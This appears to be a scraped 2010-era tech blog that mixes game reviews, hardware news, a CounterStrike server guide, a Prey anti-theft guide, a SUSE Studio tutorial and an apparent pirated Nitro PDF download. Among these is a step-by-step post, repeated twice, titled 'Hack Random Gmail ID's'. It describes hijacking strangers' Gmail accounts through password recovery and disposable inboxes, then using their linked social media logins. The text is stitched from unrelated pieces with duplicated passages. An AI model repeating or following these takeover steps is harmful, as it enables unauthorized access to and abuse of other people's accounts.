WFC sticks as closely to the franchise fans grew up with. If you’ve ever wanted to fight Soundwave as he unleashes Frenzy, Laserbeak and Rumble, now’s your chance. If you’ve ever wanted to take down the coolest Autobot of all-time, Omega Supreme, buckle up, because that fight is one you’ll remember for years to come. True fans will also rejoice at all the cheesy dialogue and character traits. Optimus Prime still sounds like he’s desperately trying to be everyone’s friend and Starscream is still a thorn in Megatron’s mechanical backside.
WFC is worth the money for the multiplayer features alone. The developers have taken all the gameplay elements that made Modern Warfare 2 so successful and added to them, to create one of the best multiplayer experiences on the market right now. While multiplayer death matches are as fast as they are furious, there’s nothing like teaming up with another 2 mates to work your way through the chapters co-operatively, especially if you attempt this feat on hard.
Overall, WFC will appeal to anyone who appreciates a good action game. Transformers fans will be talking about this game for the next few months and non-fans are likely to be converted. Get into it, you won’t regret it.
Blur- The shooter on wheels

There are two types of games in this world. There are the serious games, with their licensed Mitsubishis and Lamborghinis, and then there are the casual games, with their karts and trucks. And then there is Blur, with its best of both worlds.
First of all, if you want proper, typical racing, stop reading this and get yourself a Need for Speed or a Gran Turismo; because this is as far from realistic racers as it gets. Any further and you call it a RPG. That’s because this not all about cars.
This is about cars equipped with power ups that can blast, bash, shove, and blow up other cars sky- high. This is about the real drivers, drivers with enough substance to weave their way through mines, bombs, and every other weapon in the world and its cat. This is about thinking faster than you can think. This is where everything is just a blur.
The story basically needs you to collects ‘lights’ by winning and fans by performing cool stuff. Yes, that’s collecting lights and fans. How funny. Lights unlock new races and fans give you new cars. There is no real ‘story’ here; but hey, do you really need one?
No, you don’t. This is because you will never be following the story anyway. At least I wasn’t. When you are weaving your way through random electric cyclones or dodging two mines at a time, the story is the last thing you would ponder at. The game keeps you on constant alert for alternate routes, and a handy beeper warns you of any missiles launched on you. The AI is perfect, providing a great level of competition, while not being too taxing on your patience and skill.
Finally, the aiming system is also very good, and makes shooting at high speeds very easy. And, you cant beat shooting a Chevrolet Camaro with a Dodge Charger RTS, can you?
Hack Random Gmail ID’s
step 1: first signout of your gmail account .
step 2: go to “I Cannot Access My Account ” tab which is below the password field
step 3: go to Yopmail.com and enter any random name eg:ron
and then click check inbox
and leave it open.
step 4: On “I Cannot Access My Account ” page in Gmail just click forgot my username and go to username recovery page.
Step 5: Enter The Yopmail email you just opened eg :ron@yopmail.com
Step 6: now click check for new emails tab in yopmail you will get all the gmail id’s associated with it eg you’ll get some gmail id’s like xx@gmail.com copy that id
step 7: just go again to the “I Cannot Access My Account ” in gmail and this time choose forgot my password and go to password recovery page
step 8:Now Enter The Gmail Id You Copied xx@gmail.com in username
fill the captcha and everything
step9: If The Gmail Password recovery ever asks a security question then no need to panic !
look below the security question there will be a tab link send the reset password link to my recovery email
step 10:just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password
Yipee !! You Just hacked A Gmail Account
P.S :There Are Fb, Twitter,Various Forums Logins Too Attached With The Emails So Just Enjoy Using Their Account!!
You Can Use : http://www.mailinator.com,http://mailcatch.com,http://www.tempemail.net
instead of http://www.yopmail.net
step 2: go to “I Cannot Access My Account ” tab which is below the password field
step 3: go to Yopmail.com and enter any random name eg:ron
and then click check inbox
and leave it open.
step 4: On “I Cannot Access My Account ” page in Gmail just click forgot my username and go to username recovery page.
Step 5: Enter The Yopmail email you just opened eg :ron@yopmail.com
Step 6: now click check for new emails tab in yopmail you will get all the gmail id’s associated with it eg you’ll get some gmail id’s like xx@gmail.com copy that id
step 7: just go again to the “I Cannot Access My Account ” in gmail and this time choose forgot my password and go to password recovery page
step 8:Now Enter The Gmail Id You Copied xx@gmail.com in username
fill the captcha and everything
step9: If The Gmail Password recovery ever asks a security question then no need to panic !
look below the security question there will be a tab link send the reset password link to my recovery email
step 10:just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password
Yipee !! You Just hacked A Gmail Account
P.S :There Are Fb, Twitter,Various Forums Logins Too Attached With The Emails So Just Enjoy Using Their Account!!
You Can Use : http://www.mailinator.com,http://mailcatch.com,http://www.tempemail.net
instead of http://www.yopmail.net
PC + Xbox 360

Have you ever dreamt of having an all-in-one gaming machine that consolidates a full gaming PC with your favorite consoles? Well, the designers at Origin PC have, and today announced the introduction of The Big O; a high-power gaming PC that features a built-in Xbox 360.
Each PC comes with a built-in Xbox 360 ‘Slim’, which can be played while the PC is running other tasks and software, and supports all of the same connections and features of a full console. While the built-in Xbox 360 is certainly the biggest selling point of The Big O, it is actually one of the fastest gaming rigs available. The entry level version of the system features an overclocked 4.0GHz Intel Core i7 930 processor, a liquid cooled Rampage III Extreme motherboard, dual NVIDIA GTX 480 GPUs, 6GBs of memory, dual 50GB SSD drives, a 2TB hard drive, Creative Fatal1ty sound card, and built-in Blu-ray burner. Sounds expensive? It is; Origin has priced the base configuration at $7,669(about 4 lac Rs.)
If that wasn’t enough to break your bank, The Big O is also offered in the configuration used by CPU Magazine, which features dual Intel Xeon X5680 processors overclocked to 4.3GHz, an EVGA SR2 motherboard, liquid cooling, quad SLI EVGA GTX 480 GPUs, 12GBs of memory, four 50GB SSD drives, two 2TB hard drives, a built-in Blu-ray burner, and a built-in 8 channel HD audio sound card, at a price of $16,999(8 LAKHS!!!)
Play CounterStrike online with your friends on your own server
First of all, I made the whole thing on my own. Also, you are expected to have some knowledge of computers to attempt this. So, let’s do this
Go to
Set up a Static IP
Vista users- Network connections can be found in Network and Sharing center.
Also, you may need to go to (id and password ‘admin’ without the quotes) and get the DNS addresses from there.

Now, we will forward the port. Pick a random port number between 20000 and 30000.
Lets say you pick 27255.
We have to forward this port.
To do this, do to from your browser.
Then, go to advanced options and then NAT. Click add.
Choose custom server, give it a name; then go down and then in the first line type 27255 in both the boxes and select TCP from the scroll down menu. Do the same for the next line, but make sure you select UDP. Then click save.
Your NAT screen should now look something like this.

Now that you have forwarded the port, you can make the server. Go to
d Disk (C:)/Program Files/CounterStrike 1.6/ and open hlds.exe

Now you need to configure the server. Choose only the port which you forwarded.

Now you should have screen like the one below. Copy the highlighted circled text.

Then start CS and open then console(pres the ` key beside 1). Type- connect <space> <paste the ip and port here> and hit enter.

If it connects you did everything ok.
You are now ready to invite your friends. But first, we need your external ip. For this, go to
and copy the address

Give this address to your friends in the format
<ip address>:<port>
Your friends should connect by going to their console and typing- connect <address that you gave them>
Example: connect

If they connect, you are done!
Have fun playing!!!
To play again, start from STEP 3
Go to
Set up a Static IP
Vista users- Network connections can be found in Network and Sharing center.
Also, you may need to go to (id and password ‘admin’ without the quotes) and get the DNS addresses from there.

Now, we will forward the port. Pick a random port number between 20000 and 30000.
Lets say you pick 27255.
We have to forward this port.
To do this, do to from your browser.
Then, go to advanced options and then NAT. Click add.
Choose custom server, give it a name; then go down and then in the first line type 27255 in both the boxes and select TCP from the scroll down menu. Do the same for the next line, but make sure you select UDP. Then click save.
Your NAT screen should now look something like this.

Now that you have forwarded the port, you can make the server. Go to

Now you need to configure the server. Choose only the port which you forwarded.

Now you should have screen like the one below. Copy the highlighted circled text.

Then start CS and open then console(pres the ` key beside 1). Type- connect <space> <paste the ip and port here> and hit enter.

If it connects you did everything ok.
You are now ready to invite your friends. But first, we need your external ip. For this, go to
and copy the address

Give this address to your friends in the format
<ip address>:<port>
Your friends should connect by going to their console and typing- connect <address that you gave them>
Example: connect

If they connect, you are done!
Have fun playing!!!
To play again, start from STEP 3
les liens de téléchargement (links to download ):
partie1 :http://adf.ly/63qd
partie2 :http://adf.ly/63qe
partie3 :http://adf.ly/63qf
partie1 :http://adf.ly/63qd
partie2 :http://adf.ly/63qe
partie3 :http://adf.ly/63qf
How to Track and (Potentially) Recover Your Stolen Laptop or Android with Prey
How to Track and (Potentially) Recover Your Stolen Laptop or Android with Prey

Why Prey?
There are obvious reasons to like Prey. Chief among them, it’s free to use for up to three devices of any kind, from computers running Windows, Mac, or Linux to Android devices. But that wouldn’t mean anything if the tracking Prey provided wasn’t really solid. It’s not fool-proof, especially if the thief wants to entirely wipe your computer or phone, but if that’s not the case, it gives you a fighting chance.We’ll tell you why in readable text, being a blog and all, but we think our video walkthrough, embedded above, tells the tale even better—with old-timey music, too,courtesy of Incompetech.
On a laptop with a webcam, a Wi-Fi chip, and Prey installed, it’s a good bet you’ll have a photo of your thief and an approximate location on them just as soon as they have your computer running for a few minutes. You don’t have to actively search, either—devices with Prey installed in the background “phone home” to your web-based account every 20 minutes by default (you can decrease this interval), spilling their guts about everything they’re doing.

Webcam snaps, desktop screenshots, lists of modified files and running programs, network data galore, and much more are provided to those who want to quietly track their, uh, prey. If you’d prefer to think that maybe someone just found your device, you can set read-aloud alerts, fire off alarms, change the system wallpaper, lock it with a password, and remotely wipe out your browser data—all from any browser you can get to.
The basics of installing and using Prey are covered in the video, but here’s a brief run-through:
Step One: Set It and Forget It

Because it’s tracking software that doesn’t want to be seen, Prey is almost invisible when it’s running on your system, without any configuration or executable files to be seen. In fact, once you’ve deleted the installer, you shouldn’t be able to find Prey at all in your system, because that’s the idea. It quietly and quickly checks in with Prey’s servers in the background, at an interval you decide, to see if the owner has logged in and marked it as stolen. That’s all it does—until you flip the switch on Prey’s servers to note that it is, in fact, stolen, or ask for an update on the hardware profile.

Step Two: Set Your Modules

The main exception would be the “Webcam” option. If your laptop has a webcam that must activate a very distinct light or LED before snapping a picture, it could be an obvious give-away and tip your hand. MacBooks, for example, turn on a green LED when grabbing images from the webcam. If you wanted to go stealth and not let the unlawful owner know you had them, you could shut this off—but you’d likely be better off trying to grab at least one picture of the thief unawares. (He or she may not be perceptive or paranoid enough to catch what’s going on.)

Alarm, Alert, Change Wallpaper, and the password-protected Lock are pretty self-explanatory. Our volunteer “thief” Whitson reported that the alarm is, in fact, quite loud and attention-getting, and that the pop-up alert comes up over anything else you may be doing.
The “Secure” module is where you make your big security decisions. You can set Prey to wipe out your entire password keychain, delete data from Firefox, Safari, or Chrome (sorry, Opera users), or wipe down Outlook or Thunderbird. A total account wipe-out would be a nice option, of course, but there’s likely a compromise between making Prey still active and having data deletion access.
Android SIM Protection
Android phones set up with Prey actually have fewer reporting and alarm modules than laptops, but they do have one unique feature: SIM card protection. If a thief attempts to swap out the SIM card in your phone, the new SIM number is captured and text-messaged to a contact you set up in the Prey options. With that kind of data and a police contact, you’re pretty close to tracking down your phone.Step Three: Using Your Reports

First things first, report your laptop or device stolen to the police. The cynical may assume they don’t care or don’t have the know-how to track your gear, but the cynical often aren’t shielded members of a law enforcement agency. Give the police everything you have on your device, including serial numbers, identifying stickers or characteristics, and the last place you knew you had it. It never hurts. When using the similar “Find my iPhone” feature of the MobileMe service, police in Madison, Wisc. were able to track down two iPhones stolen from a store. Your mileage will vary, but it’s best to head through official channels first.
If you’re on your own, you can hope that the thief or other person toting your laptop makes a regular run of certain Wi-Fi spots. You’ll have the IP address they’re connecting outward from, the name and details of the Wi-Fi spot they’re connecting to, and a list of the programs they’re running, connections they’re making, and other details. Your best hope is that geo-location through available Wi-Fi can point you somewhere unique in an uncrowded neighborhood, or that the Wi-Fi they connect to is unique and identifiable—”JoesCoffee”, “246JonesSt”, or something similar would be ideal. If your webcam can grab a clear snap of the thief, all the better. If you’ve got nothing quite so unique and helpful, a visit to the traceroute and other tools at network-tools.com (or nearly any site resulting from a “traceroute” Google search) can potentially get you closer to your missing goods.
In any case, contact your local police rather than try and pin the phone down yourself. One blogger snatched back an iPhone with some help from friends, but he suggests your journey might not have such a funny ending.
Nokia Launches its new C3
Nokia has just revealed its second “Touch and Type” handset in a surprise announcement at the Nokia World conference at London.
As the name suggests, the C3 Touch and Type has a normal keypad as well as a touchscreen. The C3 Touch and Type is visually similar to the existing devices like the 6700 classic and Nokia 6300 phones and is a Series 40 based handset.

The phone is a Quadband ready device and supports 3G/HSPA and Wi-Fi internet connectivity. It comes with Nokia messaging 3.0, the latest incarnation of Nokia’s email, instant messaging and communities client offering Facebook and Twitter. On the imaging front, there is a 5 megapixel camera with flash at the rear. The C3 Touch and Type will come in Silver, Warm grey and Khaki Gold colours. The screen is not particularly large at just 2.4-inches but that is perfectly fine for a mid-range product. The C3 Touch and Type supports microSD memory cards for storage up to 32MB.

The C3 Touch and Type is expected to cost Euro 145 (Rs. 8,700) excluding taxes or subsidies. It will start shipping in the fourth quarter of this year.
As the name suggests, the C3 Touch and Type has a normal keypad as well as a touchscreen. The C3 Touch and Type is visually similar to the existing devices like the 6700 classic and Nokia 6300 phones and is a Series 40 based handset.

Ever dreamed of creating your own OS?
Ever Dreamed of creating your own “CUSTOM OS”? Then SUSESTUDIO is to the rescue!

Think you can make a better fast-booting, Chrome-focused OS than Google? Want to craft a custom Linux system that boots from a USB stick? SUSE Studio gives you 15 GB to do exactly that, and you do it all online.
SUSE Studio is what powered the fan-made “Chrome OS”, which, in that case, was a semi-stripped-down system loaded with the developers’ version of Chrome, Google webapp links, and OpenOffice. If speed and cloud computing aren’t your bag, you can create a fully functional system with Firefox, 3D graphics, and whatever apps you can find installed. Want your system to start up with an AWN dock and Launchy keystroke launcher running? Not a problem.
Even if you don’t know all that much about Linux, it’s pretty easy to build a system you can boot from a USB stick or live CD/DVD, run inside a virtual machine program, or actually install it—or, heck, even test it out in your web browser.
Here’s a basic walkthrough of building a system with SUSE Studio. In this case, we’re looking to build a GNOME-based system that would boot fairly quick and use Chrome for most of its functions, and use GNOME-Do as the primary application launcher.
Get an account, choose your desktop
First things first, you’ll need to grab an invitation and account from SUSE Studio. While it’s invite-only at the moment, I received my invite only 10 minutes after registering and filling out a quick survey that suggested it would boost my invite reply time. Once your invite arrives, you can sign into SUSE Studio with your Google or Yahoo account, or any OpenID provider. Not sure how to nab an OpenID? Here’s a quick video tutorial.
Once you’re signed in, head to your “Home” screen and click the “Create new appliance” link in the upper-right. SUSE Studio calls each bootable system you create an “appliance” throughout the process. You’ll be asked to choose your “base template,” which includes the GNOME and KDE desktops, a Just Enough OS (jeOS) option, and server or command-line-only choices. Most folks will want to lean toward GNOME or KDE setups, as they’re the most familiar graphical environments. If you’re familiar with Linux enough to know how to build a login manager and desktop from a command line system, though, go ahead and play around—you can’t really hurt anything.
Choose your software
This is the real meat and potatoes of creating a system. Click the “Software” tab and check out the packages already going into your system.
Based on your selection of a GNOME desktop, and SUSE Studio assuming you want the Linux basics needed to boot, a few packages and repositories are already installed for you. They’re based on a basic installation of OpenSUSE, but you could wipe the slate clean and start over with another RPM-based repository, if you so chose.

Change the look and feel
Once you’re done tinkering with your apps, head over to the Configuration tab to mess with your eye candy and determine how your system will boot up. Start at the “General” sub-section, making sure to change the user name at bottom to something other than “Tux” and change the password away from the standard “linux.” You can set how you want your system to find a network connection (anything other than the manual or no-network options should be fine), and whether to enable a firewall.
The Personalize section only has two parameters, but who doesn’t like to see their own logos and backgrounds stamped on a system? Next over, make sure the “Startup” section has you set to boot into a graphical login. Under “Desktop,” you can set the OS to automatically boot to a desktop for faster start-up times, and the “Configuration” field lets those planning to install to a disk or USB drive, or run in a virtual machine, fine-tune their memory and disk use settings. “Overlay files” and “Scripts” can mostly be skipped, unless you’ve got documents you need to have in your test system or already work at a high level of Linux knowledge.
Grab and boot your OS

Don’t have the time or patience to burn a CD or install a new virtual machine? SUSE Studio actually lets you run your custom-built appliances on their own virtualization servers, for up to one hour, for free. Hit the “testdrive” link on one of your builds, and wait for it to boot up.

I was fairly impressed with the performance of a virtual machine I created entirely online, running on servers likely a world away and controlled entirely through a browser.
Most Expensive Web Addresses
Web addresses that you see on every single sites are what’s called, domain names. They’re simply names that are bought, and of course, domain names became important part of a website.
There must be countless names that aren’t taken for sure, but there are also so much that are in demands due to its short and wanted names. What happens to those addresses?
People can sell them for a certain price according to its demand
By statistic of the estimated prices of the web addresses, here are TOP FIVE of the MOST EXPENSIVE Web Addresses
There must be countless names that aren’t taken for sure, but there are also so much that are in demands due to its short and wanted names. What happens to those addresses?
People can sell them for a certain price according to its demand
By statistic of the estimated prices of the web addresses, here are TOP FIVE of the MOST EXPENSIVE Web Addresses
- Sex.com – $12 million
- Porn.com – $9.2 million
- Business.com $7.5 million
- Diamond.com $7.5 million
- Beer.com – $7 million

samedi 18 septembre 2010
download Nitro PDF Professional 6.0.3 the complete Adobe Acrobat reader 2010
Nitro PDF Professional, the complete Adobe? Acrobat? alternative, enables you to do more with PDF through powerful tools to create, convert, edit, combine, secure, annotate, form-fill, and save 100% industry-standard PDF files. Recipient of multiple best product awards, Nitro Pro is specifically designed for the business user and makes working with PDF faster and easier than ever before!
Create PDF
Create PDF and PDF/A files from virtually any Windows application, with full control over PDF output options. Offering one-click conversion for many commonly-used file types (including Microsoft Word, Excel, PowerPoint, WordPerfect, and more), Nitro PDF Professional simplifies the PDF creation process. All PDF files created with Nitro PDF Professional are 100% compatible with other PDF viewing applications including Adobe Reader and Adobe Acrobat.
Edit PDF
Edit PDF content, no matter what it is. From correcting minor typos and updating or removing text, to advanced image editing tasks such as inserting, replacing, cropping, resizing and downsampling, Nitro PDF Professional makes it easy to make last-minute edits. Create consistency throughout your documents by inserting headers, footers, watermarks, page numbering and more. Edit document properties and optimize PDF for distribution, creating polished, recipient-ready PDF files.
Convert PDF
Easily convert PDF to Word and PDF to RTF with industry-leading accuracy, enabling quick content reuse in Microsoft Word, WordPerfect, OpenOffice and more. Extract text and images from PDF files in a single click, for trouble-free repurposing in other programs. Copy entire blocks of text or take snapshots of PDF pages for quick pasting into another document.
Review & annotate PDF
Streamline processes and eliminate paper waste through electronic document review. Use Nitro PDF Professional's intuitive commenting tools to add notes, text feedback, drawing markups and more. Reply to feedback from others, or view, consolidate, organize and summarize reviewer comments, all from a single location. Efficiently collaborate and share your comments with Adobe Acrobat and Adobe Reader users.
PDF forms
Create PDF forms quickly and easily using a robust set of form design and editing tools. In just a few clicks, turn static PDF documents into professional-looking PDF forms containing text fields, buttons, checkboxes, javascript and more. Fill in, submit, print and save PDF forms, all without breaking the bank.
Secure PDF
Control how people view and use your sensitive and confidential information through robust PDF encryption. Use passwords and digital certificates to restrict who can open files and perform other tasks such as printing, editing, copying and form filling. Use digital signatures and certification to ensure document integrity and prevent content tampering.
Assemble & combine PDF
Combine documents, spreadsheets, presentations and more into a single, polished PDF file. Nitro Pro's powerful editing tools enable you to reorder, delete, insert, extract, replace, split, and rotate pages, providing you precise control over your entire document while guaranteeing your information is presented exactly as intended.
Release description
A major new version release, Nitro PDF Professional 6.0 comprises several brand-new features, significant performance enhancements and feature extensions, and important bug fixes.
New features
Convert PDF for reuse in Microsoft Word, WordPerfect, OpenOffice, GoogleDocs, and more with the most accurate, industry-leading PDF conversion technology. Create highly-editable files that retain page layouts, working tables, correctly justified paragraphs, drawing shapes, and more.
Create PDF files up to 50% faster
Summarize comments for paper-based viewing
PDF/A compliance support
Document management system (DMS) integration support
Grid and Snap-to-Grid tools
Full control over the PDF creation process
Major user interface improvements, including a new, easy-to-access Navigation pane, a Comments List panel for working with more detailed comments, and a dedicated Text Editing context ribbon for inserting and updating text.
Major improvements to the underlying PDF library for faster processing of all files.
New features
Support for all 64-bit versions of Windows.
A replace text commenting tool.
Support for 'Show/hide field' action.
Full support of Unicode fonts (in all areas of the application) including Chinese, Japanese and Korean.
Integration with Lotus Notes.
Streamlined deployment for enterprise customers.
download link :- download here
Create PDF
Create PDF and PDF/A files from virtually any Windows application, with full control over PDF output options. Offering one-click conversion for many commonly-used file types (including Microsoft Word, Excel, PowerPoint, WordPerfect, and more), Nitro PDF Professional simplifies the PDF creation process. All PDF files created with Nitro PDF Professional are 100% compatible with other PDF viewing applications including Adobe Reader and Adobe Acrobat.
Edit PDF
Edit PDF content, no matter what it is. From correcting minor typos and updating or removing text, to advanced image editing tasks such as inserting, replacing, cropping, resizing and downsampling, Nitro PDF Professional makes it easy to make last-minute edits. Create consistency throughout your documents by inserting headers, footers, watermarks, page numbering and more. Edit document properties and optimize PDF for distribution, creating polished, recipient-ready PDF files.
Convert PDF
Easily convert PDF to Word and PDF to RTF with industry-leading accuracy, enabling quick content reuse in Microsoft Word, WordPerfect, OpenOffice and more. Extract text and images from PDF files in a single click, for trouble-free repurposing in other programs. Copy entire blocks of text or take snapshots of PDF pages for quick pasting into another document.
Review & annotate PDF
Streamline processes and eliminate paper waste through electronic document review. Use Nitro PDF Professional's intuitive commenting tools to add notes, text feedback, drawing markups and more. Reply to feedback from others, or view, consolidate, organize and summarize reviewer comments, all from a single location. Efficiently collaborate and share your comments with Adobe Acrobat and Adobe Reader users.
PDF forms
Create PDF forms quickly and easily using a robust set of form design and editing tools. In just a few clicks, turn static PDF documents into professional-looking PDF forms containing text fields, buttons, checkboxes, javascript and more. Fill in, submit, print and save PDF forms, all without breaking the bank.
Secure PDF
Control how people view and use your sensitive and confidential information through robust PDF encryption. Use passwords and digital certificates to restrict who can open files and perform other tasks such as printing, editing, copying and form filling. Use digital signatures and certification to ensure document integrity and prevent content tampering.
Assemble & combine PDF
Combine documents, spreadsheets, presentations and more into a single, polished PDF file. Nitro Pro's powerful editing tools enable you to reorder, delete, insert, extract, replace, split, and rotate pages, providing you precise control over your entire document while guaranteeing your information is presented exactly as intended.
Release description
A major new version release, Nitro PDF Professional 6.0 comprises several brand-new features, significant performance enhancements and feature extensions, and important bug fixes.
New features
Convert PDF for reuse in Microsoft Word, WordPerfect, OpenOffice, GoogleDocs, and more with the most accurate, industry-leading PDF conversion technology. Create highly-editable files that retain page layouts, working tables, correctly justified paragraphs, drawing shapes, and more.
Create PDF files up to 50% faster
Summarize comments for paper-based viewing
PDF/A compliance support
Document management system (DMS) integration support
Grid and Snap-to-Grid tools
Full control over the PDF creation process
Major user interface improvements, including a new, easy-to-access Navigation pane, a Comments List panel for working with more detailed comments, and a dedicated Text Editing context ribbon for inserting and updating text.
Major improvements to the underlying PDF library for faster processing of all files.
New features
Support for all 64-bit versions of Windows.
A replace text commenting tool.
Support for 'Show/hide field' action.
Full support of Unicode fonts (in all areas of the application) including Chinese, Japanese and Korean.
Integration with Lotus Notes.
Streamlined deployment for enterprise customers.
download link :- download here
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